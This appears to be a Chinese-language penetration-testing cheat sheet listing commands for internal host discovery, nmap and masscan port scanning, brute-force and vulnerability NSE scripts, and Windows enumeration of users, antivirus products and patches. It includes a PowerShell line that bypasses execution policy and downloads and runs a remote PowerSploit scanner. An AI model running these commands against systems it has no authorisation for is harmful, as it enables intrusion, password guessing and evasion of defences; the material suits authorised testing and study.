主机发现
fping -agq 10.10.10.0/24
nbtscan.exe -m 10.10.10.0/24
,工具地址:http://www.unixwiz.net/tools/nbtscan.htmlnbtscan -r 10.10.10.0/24
for /l %i in (1,1,255) do @ ping 10.0.0.%i -w 1 -n 1|find /i "ttl="
@for /l %i in (1,1,255) do @ping -n 1 -w 40 192.168.0.%i & if errorlevel 1 (echo 192.168.0.%i>>c:a.txt) else (echo 192.168.0.%i >>c:b.txt)
powershell.exe ‐exec bypass ‐Command "Import‐Module ./Invoke‐TSPingSweep.ps1; Invoke‐TSPingSweep ‐StartAddress 192.168.1.1 ‐EndAddress 192.168.1.254 ‐ResolveHost ‐ScanPort ‐Port 445,135"
nmap -v -sn 192.168.0.0/16 10.0.0.0/8
netdiscover -r 192.168.1.0/24 -i wlan0
端口扫描及服务识别
Nmap
- 快速扫描:
nmap --min-rate 10000 -A -p1-65535 -T5 10.10.10.2
常用参数:
--min-rate
:最小速率-A
:启用系统检测,版本检测,脚本扫描和路由跟踪-p
:端口范围-T
:扫描速度等级(0-5)-O
:启用系统检测-sV
:启用服务信息检测-sT
:TCP扫描-sS
:SYN扫描-sA
:ACK扫描-sU
:UDP扫描-sR
:RPC扫描-sP
:ICMP扫描-sn
:不扫描端口-S
:伪造源地址--host-timeout
:主机超时时间,单位ms--scan-delay
:两次报文时间间隔,单位ms-oN
:输出正常文件-oX
:输出xml文件
高级用法
默认脚本扫描,主要搜索各种应用服务的信息,收集后,可再针对具体服务进行攻击
nmap --script=default 192.168.88.131
检查是否存在常见漏洞
nmap --script=vuln 192.168.1.104
提供暴力破解的方式,可对数据库、smb、snmp等进行简单密码的暴力猜解
nmap --script=brute 192.168.88.131
利用FTP指定脚本对目标特定FTP协议进行密码爆破
nmap --script=ftp-brute.nse 192.168.88.131
利用第三方的数据库或资源,例如进行whoise解析
nmap --script=external 192.168.88.131
代理扫描
proxychains nmap -sT -Pn 192.168.52.138 192.168.52.141 192.168.52.143 --min-rate 10000 --script=default
masscan
masscan --ports 1-10000 10.10.10.120 --adapter-ip 10.10.10.1
常用参数:
--adapter-ip
:指定发包地址--adapter-port
:指定发包源端口--adapter-mac
:指定发包源MAC--router-mac
:指定网关MAC--exclude
:指定排除扫描的IP
示例
masscan -p0-65535 192.168.3.0/24 --banners --rate 100000000
masscan --ping 192.168.3.0/24 --rate 1000000 --adapter-ip 192.168.3.1
PowerSploit
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts 192.168.58.0/24 -T 4 -ports '445,1433,3389,80' -oA c:\windows\temp\res.txt"
Nishang
get-help invoke-portscan -full Invoke-PortScan -StartAddress 192.168.58.1 -EndAddress 192.168.58.254 -ResolveHost
查看Windows操作系统信息
版本信息
- CMD:
ver
,systeminfo
- WMIC:
wmic OS get Caption,CSDVersion,OSArchitecture,Version
- PowerShell:
Get-WmiObject -Class Win32_OperatingSystem
用户信息
whoami
net user
net localgroup administrators
安装的软件
- WMIC:
wmic product get name,version,packagecache
- PoserShell:
Get-WmiObject -Class Win32_Product | Select-Object -Property name,version,packagecache
查看安全软件
WMIC /Node:localhost /Namespace:\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
查看服务
wmic service list brief
查看进程
tasklist
wmic process list brief
查看启动项
wmic startup get caption,location,command
查看计划任务
schtasks /query /fo list /v
查看当前在线用户
query user || qwinsta
列出或断开本地计算机和与之连接的客户端的会话
net session
查看补丁
systeminfo
wmic qfe get hotfixid,caption,description,installedon
查看防火墙配置
netsh firewall show config
Comments | NOTHING